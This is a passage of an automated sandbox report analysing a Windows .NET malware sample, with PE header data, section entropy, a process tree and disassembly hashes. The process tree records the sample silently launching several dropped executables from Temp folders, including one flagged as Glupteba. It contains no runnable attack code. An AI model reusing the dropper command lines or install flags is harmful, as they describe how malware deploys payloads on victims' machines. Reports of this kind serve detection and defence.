                                                              SSDEEP:3072:BYVN7yIYmDm4Rt79Iv7yXc5O4QjLP+ZF:+LWIw4Rt79uIerKP+Z
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`.)`............................~.... ........@.. ....................................@................................

                                                              File Icon

                                                              Icon Hash:70c8b8e8e8b2e470

                                                              Static PE Info

                                                              General

                                                              Entrypoint:0x40f57e
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, LINE_NUMS_STRIPPED
                                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                              Time Stamp:0x60291460 [Sun Feb 14 12:15:28 2021 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:v4.0.30319
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                              Entrypoint Preview

                                                              Instruction
                                                              jmp dword ptr [00402000h]
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al

                                                              Data Directories

                                                              Name                                  Virtual Address  Virtual Size  Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT          0xf524           0x57          .text
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE        0x10000          0x2d8e0       .rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC       0x3e000          0xc           .reloc
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                              Sections

                                                              Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy          Characteristics
                                                              .text   0x2000           0xd584        0xd600    False     0.814507885514   data       7.45568156237    IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                              .rsrc   0x10000          0x2d8e0       0x2da00   False     0.265705265411   data       5.35558893309    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .reloc  0x3e000          0xc           0x200     False     0.044921875      data       0.0815394123432  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                              Resources

                                                              Name           RVA      Size     Type                                                                                                                                  Language  Country
                                                              RT_ICON        0x102b0  0x5909   PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                              RT_ICON        0x15bbc  0x10828  dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                                              RT_ICON        0x263e4  0x94a8   data
                                                              RT_ICON        0x2f88c  0x5488   data
                                                              RT_ICON        0x34d14  0x4228   dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 16318463, next used block 4294909696
                                                              RT_ICON        0x38f3c  0x25a8   data
                                                              RT_ICON        0x3b4e4  0x10a8   data
                                                              RT_ICON        0x3c58c  0x988    data
                                                              RT_ICON        0x3cf14  0x468    GLS_BINARY_LSB_FIRST
                                                              RT_GROUP_ICON  0x3d37c  0x84     data
                                                              RT_VERSION     0x3d400  0x32c    data
                                                              RT_MANIFEST    0x3d72c  0x1b4    XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators

                                                              Imports

                                                              DLL          Import
                                                              mscoree.dll  _CorExeMain

                                                              Version Infos

                                                              Description       Data
                                                              Translation       0x0000 0x04b0
                                                              LegalCopyright    Copyright 2020
                                                              Assembly Version  6.3.0.0
                                                              InternalName      BarraNikLik.exe
                                                              FileVersion       6.6.2.8
                                                              CompanyName
                                                              LegalTrademarks
                                                              Comments
                                                              ProductName       BarraNikLik
                                                              ProductVersion    6.6.2.8
                                                              FileDescription   BarraNikLik
                                                              OriginalFilename  BarraNikLik.exe

                                                              Network Behavior

                                                              No network behavior found

                                                              Code Manipulations

                                                              Statistics

                                                              CPU Usage

                                                              Memory Usage

                                                              High Level Behavior Distribution

                                                              Behavior

                                                              System Behavior

                                                              General

                                                              Start time:00:55:00
                                                              Start date:15/02/2021
                                                              Path:C:\Windows\System32\svchost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                              Imagebase:0x7ff6eb840000
                                                              File size:51288 bytes
                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              General

                                                              Start time:00:55:00
                                                              Start date:15/02/2021
                                                              Path:C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:'C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe'
                                                              Imagebase:0x880000
                                                              File size:242688 bytes
                                                              MD5 hash:CF35EDDE149E46EE5DCAFA4151DD4A81
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Reputation:low

                                                              General

                                                              Start time:00:55:03
                                                              Start date:15/02/2021
                                                              Path:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 0 30601988b56f78c9.53290271 0 102
                                                              Imagebase:0x470000
                                                              File size:523264 bytes
                                                              MD5 hash:E252EF40FF9D0A528918215DB75A8EB9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Antivirus matches:
                                                              • Detection: 100%, Joe Sandbox ML
                                                              • Detection: 28%, ReversingLabs
                                                              Reputation:low

                                                              General

                                                              Start time:00:55:12
                                                              Start date:15/02/2021
                                                              Path:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 1 3.1613346908.6029b85c957f5
                                                              Imagebase:0x60000
                                                              File size:523264 bytes
                                                              MD5 hash:E252EF40FF9D0A528918215DB75A8EB9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Reputation:low

                                                              General

                                                              Start time:00:55:18
                                                              Start date:15/02/2021
                                                              Path:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 2 3.1613346908.6029b85c957f5
                                                              Imagebase:0xa60000
                                                              File size:523264 bytes
                                                              MD5 hash:E252EF40FF9D0A528918215DB75A8EB9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Reputation:low

                                                              General

                                                              Start time:00:55:24
                                                              Start date:15/02/2021
                                                              Path:C:\Windows\System32\svchost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                              Imagebase:0x7ff6eb840000
                                                              File size:51288 bytes
                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              General

                                                              Start time:00:55:27
                                                              Start date:15/02/2021
                                                              Path:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 1 3.1613346908.6029b85c957f5
                                                              Imagebase:0xe10000
                                                              File size:523264 bytes
                                                              MD5 hash:E252EF40FF9D0A528918215DB75A8EB9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Reputation:low

                                                              General

                                                              Start time:00:55:36
                                                              Start date:15/02/2021
                                                              Path:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 2 3.1613346908.6029b85c957f5
                                                              Imagebase:0x560000
                                                              File size:523264 bytes
                                                              MD5 hash:E252EF40FF9D0A528918215DB75A8EB9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Reputation:low

                                                              General

                                                              Start time:00:55:38
                                                              Start date:15/02/2021
                                                              Path:C:\Windows\System32\svchost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                              Imagebase:0x7ff6eb840000
                                                              File size:51288 bytes
                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              General

                                                              Start time:00:55:39
                                                              Start date:15/02/2021
                                                              Path:C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:'C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe' /S /pubid=1 /subid=451
                                                              Imagebase:0x400000
                                                              File size:1188864 bytes
                                                              MD5 hash:7504A339516D6AB6F35C55CD96810040
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:Borland Delphi
                                                              Reputation:low

                                                              General

                                                              Start time:00:55:39
                                                              Start date:15/02/2021
                                                              Path:C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:'C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe' 57a764d042bf8
                                                              Imagebase:0x260000
                                                              File size:994304 bytes
                                                              MD5 hash:A0B220137332876ABC6DD8D91F2DD363
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Antivirus matches:
                                                              • Detection: 100%, Avira
                                                              • Detection: 100%, Joe Sandbox ML
                                                              Reputation:low

                                                              General

                                                              Start time:00:55:39
                                                              Start date:15/02/2021
                                                              Path:C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:'C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exe' testparams
                                                              Imagebase:0x3a0000
                                                              File size:472064 bytes
                                                              MD5 hash:83BD1D79670EF5335E6533AE8285AB22
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Antivirus matches:
                                                              • Detection: 100%, Joe Sandbox ML
                                                              Reputation:low

                                                              General

                                                              Start time:00:55:39
                                                              Start date:15/02/2021
                                                              Path:C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:'C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe'
                                                              Imagebase:0x650000
                                                              File size:78336 bytes
                                                              MD5 hash:0E5F029EB6ECABF1E593E12211887506
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Reputation:low

                                                              General

                                                              Start time:00:55:39
                                                              Start date:15/02/2021
                                                              Path:C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:'C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe'
                                                              Imagebase:0x1020000
                                                              File size:721408 bytes
                                                              MD5 hash:57664817E1CE6474C6FB8201675AC09E
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Antivirus matches:
                                                              • Detection: 100%, Avira
                                                              • Detection: 100%, Joe Sandbox ML
                                                              Reputation:low

                                                              General

                                                              Start time:00:55:39
                                                              Start date:15/02/2021
                                                              Path:C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:'C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exe' /verysilent /cid=12 /subid=209
                                                              Imagebase:0x400000
                                                              File size:2332000 bytes
                                                              MD5 hash:57A499F8970931ED49142A0392846212
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:Borland Delphi
                                                              Reputation:low

                                                              General

                                                              Start time:00:55:40
                                                              Start date:15/02/2021
                                                              Path:C:\Users\user\AppData\Local\Temp\zfocqbupv0l\app.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:'C:\Users\user\AppData\Local\Temp\zfocqbupv0l\app.exe' /8-23
                                                              Imagebase:0x400000
                                                              File size:3953664 bytes
                                                              MD5 hash:CA391A385DA53FAE727E8B060FCB05C3
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000013.00000002.866048884.0000000003790000.00000040.00000001.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000013.00000003.801926180.0000000003FA0000.00000004.00000001.sdmp, Author: Joe Security
                                                              Reputation:low

                                                              Disassembly

                                                              Code Analysis

                                                                Executed Functions

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.650166305.00007FFA359C0000.00000040.00000001.sdmp, Offset: 00007FFA359C0000, based on PE: false

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.650166305.00007FFA359C0000.00000040.00000001.sdmp, Offset: 00007FFA359C0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 793b4e59461d03dcff6028515f871e8a11b67f5a0cb1ed572a1460772381b792
                                                                • Instruction ID: 36717bd6ee9bb984e8dcb5822c4f59532375c4460f9547fe091adca7bd94c17e
                                                                • Opcode Fuzzy Hash: 793b4e59461d03dcff6028515f871e8a11b67f5a0cb1ed572a1460772381b792
                                                                • Instruction Fuzzy Hash: 7931E705F18E4A0FE6A9A37C492A2BD56E2DF9B700F4581F5D00EC72D7DE1D9C064781
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.650166305.00007FFA359C0000.00000040.00000001.sdmp, Offset: 00007FFA359C0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b718e05b1d4beaf2bc3690fb4eef490881daa7e619e944d52241446983cd21e7
                                                                • Instruction ID: 6e72a8ee76d553336ec2b7cef396971ff0584ff414a1bdab6fb74cabfd87d3a9
                                                                • Opcode Fuzzy Hash: b718e05b1d4beaf2bc3690fb4eef490881daa7e619e944d52241446983cd21e7
                                                                • Instruction Fuzzy Hash: DE310831B1891E4FEBE8E72C94186B573D0EF96711B0445BAE40EC72A8EE15DC815784
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.650166305.00007FFA359C0000.00000040.00000001.sdmp, Offset: 00007FFA359C0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8e2a54021e9ceed4d73c2f42bc77ee15e754d5a0a393cc706507a4fbbac0a7ef
                                                                • Instruction ID: dcf9b99f148a160c242699790419675978feb8d3ebee44c924e066f7c5e8602b
                                                                • Opcode Fuzzy Hash: 8e2a54021e9ceed4d73c2f42bc77ee15e754d5a0a393cc706507a4fbbac0a7ef
                                                                • Instruction Fuzzy Hash: 84319C7460874A8FDF88DF18C8947A537E1FF0A314F2485ADD45ECB296CB3AA842CB41
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.650166305.00007FFA359C0000.00000040.00000001.sdmp, Offset: 00007FFA359C0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 55195053a873bf3dd7f8f62255abf2ea5327cd6323853c2db4bee1a6901e90bd
                                                                • Instruction ID: bdb6ecc744fc40653a67ea8e8e03dfd58dd2ae578a7cf0bb2ddc87c8198fc043
                                                                • Opcode Fuzzy Hash: 55195053a873bf3dd7f8f62255abf2ea5327cd6323853c2db4bee1a6901e90bd
                                                                • Instruction Fuzzy Hash: 99212B22B096464FD784E76C98589B837E1DF9721174541F7E50CCF2B7EE199C428740
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.650166305.00007FFA359C0000.00000040.00000001.sdmp, Offset: 00007FFA359C0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1b3c13bd7ebd051fd8b5129296eb6cdc65217e27408b90e084420c0c21356fb2
                                                                • Instruction ID: fadd44a2240cb18d0c2082cdff419a043340db0d4ec55b6aaf4584d16a906aa1
                                                                • Opcode Fuzzy Hash: 1b3c13bd7ebd051fd8b5129296eb6cdc65217e27408b90e084420c0c21356fb2
                                                                • Instruction Fuzzy Hash: 7611DA26B0490A8FEA84F76C984C9B833D1DF9A66174141F6E50DCB3BAED169C428740
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.650166305.00007FFA359C0000.00000040.00000001.sdmp, Offset: 00007FFA359C0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 822a0bc460329b233d2cbcf247ce3b77d9d2b4bd0d00e86f255c8e80cc830ba6
                                                                • Instruction ID: 170f19e46c4f9c52af1aed8569b1e955c2453474b2788bfe8253d195b3864d85
                                                                • Opcode Fuzzy Hash: 822a0bc460329b233d2cbcf247ce3b77d9d2b4bd0d00e86f255c8e80cc830ba6
                                                                • Instruction Fuzzy Hash: B4112621B18A8B4FE7A8DB3C941417567E1EF97311B0545BFD04EC71A9EF19DC025784
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.650166305.00007FFA359C0000.00000040.00000001.sdmp, Offset: 00007FFA359C0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 41f5da3a37f03acc103bac5f7ff7767c2dc659efcbf14db8d24fe403909e4174
                                                                • Instruction ID: b70e3f2ae79c8338c2e270c4741b888609afae1b576a86c2abebfe2a6b3668fd
                                                                • Opcode Fuzzy Hash: 41f5da3a37f03acc103bac5f7ff7767c2dc659efcbf14db8d24fe403909e4174
                                                                • Instruction Fuzzy Hash: 9301DB3261CA1D4FDB24B758A8415F6F3A4FB55334F00463BD45EC2482EF25A1598784
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.650166305.00007FFA359C0000.00000040.00000001.sdmp, Offset: 00007FFA359C0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bc1ac6446fd290240c05f1d04a242fe706ccc681d5e04868775830f089e99713
                                                                • Instruction ID: fc18b4887fd7935666f69d30a52f42502898142ce46562de05d13c58335d6010
                                                                • Opcode Fuzzy Hash: bc1ac6446fd290240c05f1d04a242fe706ccc681d5e04868775830f089e99713
                                                                • Instruction Fuzzy Hash: 4A11E27184D7CA4FC342CBA4D8555E97FF0EF07210B4981EBD489CB0A3EA2C6445C711
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.650166305.00007FFA359C0000.00000040.00000001.sdmp, Offset: 00007FFA359C0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a6429d225a5ce8fa7c41d18c257cea96805f2e2166bb2a573aadaba36472aff9
                                                                • Instruction ID: 114aca6c4dc722ba832924f4ce6db7d13e983ff5f0850be4bef606022912e88d
                                                                • Opcode Fuzzy Hash: a6429d225a5ce8fa7c41d18c257cea96805f2e2166bb2a573aadaba36472aff9
                                                                • Instruction Fuzzy Hash: 8911C426B086564FD795E33C98495BD37D1DF8762070541F3E80DCF2ABEE199C825381
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.650166305.00007FFA359C0000.00000040.00000001.sdmp, Offset: 00007FFA359C0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c0f9bfcafd894d7ca644d1d5121ee7f77ff9c26af02d1fa54992fab3bb5eac69
                                                                • Instruction ID: fee03de4729fcdf86553e7667db39094be22c0c6c3d636deadf9ba21258acbb1
                                                                • Opcode Fuzzy Hash: c0f9bfcafd894d7ca644d1d5121ee7f77ff9c26af02d1fa54992fab3bb5eac69
                                                                • Instruction Fuzzy Hash: 0F014C2A50E3D60ED722A77CA8911D97F709F43629B0A41F7D18CCA4B3EE08188DC3A5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.650166305.00007FFA359C0000.00000040.00000001.sdmp, Offset: 00007FFA359C0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 11c0735cf3980dfae17f4154cde8eedd80b9e82418b2a6e0412d45c9bed21a6a
                                                                • Instruction ID: a70b3f64ada37a3785eac4cb473e04e0562e4a0683564e636d29c04a76ee4a1c
                                                                • Opcode Fuzzy Hash: 11c0735cf3980dfae17f4154cde8eedd80b9e82418b2a6e0412d45c9bed21a6a
                                                                • Instruction Fuzzy Hash: C6015330E04A2E8FDF94EBA888452EDB7B5FF1A305F40043AC80DE3284DF7569008B80
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.650166305.00007FFA359C0000.00000040.00000001.sdmp, Offset: 00007FFA359C0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 619b96b3bb48f143d169cb955d228d9cbb3c0020eb0b45ad359365766b3f5855
                                                                • Instruction ID: fc84b0ee5dd1823de95ed756b104d3ea7f3ee341b286a8d5e558ec5062c13684
                                                                • Opcode Fuzzy Hash: 619b96b3bb48f143d169cb955d228d9cbb3c0020eb0b45ad359365766b3f5855
                                                                • Instruction Fuzzy Hash: F0E0C23081D78E5EC712572448000D9BB30FE12200F850193E45DC2052DE2D51298382
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.650166305.00007FFA359C0000.00000040.00000001.sdmp, Offset: 00007FFA359C0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5fb60086c5e8bee95946f9b0f57ca5497b66ad50c32b7ceb29959849e4df215c
                                                                • Instruction ID: 189276288ee12656c1d6187ed4a7701aaf401e0738b82025db3138a6bea2e204
                                                                • Opcode Fuzzy Hash: 5fb60086c5e8bee95946f9b0f57ca5497b66ad50c32b7ceb29959849e4df215c
                                                                • Instruction Fuzzy Hash: 0DC09B18D6594706FD58337E0D862E411C0AF57715FC44070EC0DD16C5FD4F55D96256
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.650166305.00007FFA359C0000.00000040.00000001.sdmp, Offset: 00007FFA359C0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f034eedb4cfa280b98dbae31f6bb6544cd252a2f2f78c3db2fd1867e03386e4d
                                                                • Instruction ID: cc7b88339f8ca488710eee311733c8e79ad30bd85bdd72c9da3e353ae07c726d
                                                                • Opcode Fuzzy Hash: f034eedb4cfa280b98dbae31f6bb6544cd252a2f2f78c3db2fd1867e03386e4d
                                                                • Instruction Fuzzy Hash: 18A0012120A7C15FC7438B3D842114A3FA15D4352831B44EAD0908F463D926980AEB26
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Non-executed Functions

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.650166305.00007FFA359C0000.00000040.00000001.sdmp, Offset: 00007FFA359C0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d8d2163e43098fcf73cea28e749bbb10ec9950f848dfe6d4793b6122e671f531
                                                                • Instruction ID: 7e0354fc8f0c8ab4e23c22f84ae1511c0250c3a728a22e22d2642f06897efb56
                                                                • Opcode Fuzzy Hash: d8d2163e43098fcf73cea28e749bbb10ec9950f848dfe6d4793b6122e671f531
                                                                • Instruction Fuzzy Hash: 8861CC25A6C2874FE7599B7C58444B53BD0DF87621B0981FAE88FCB2A7DE199C43C381
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

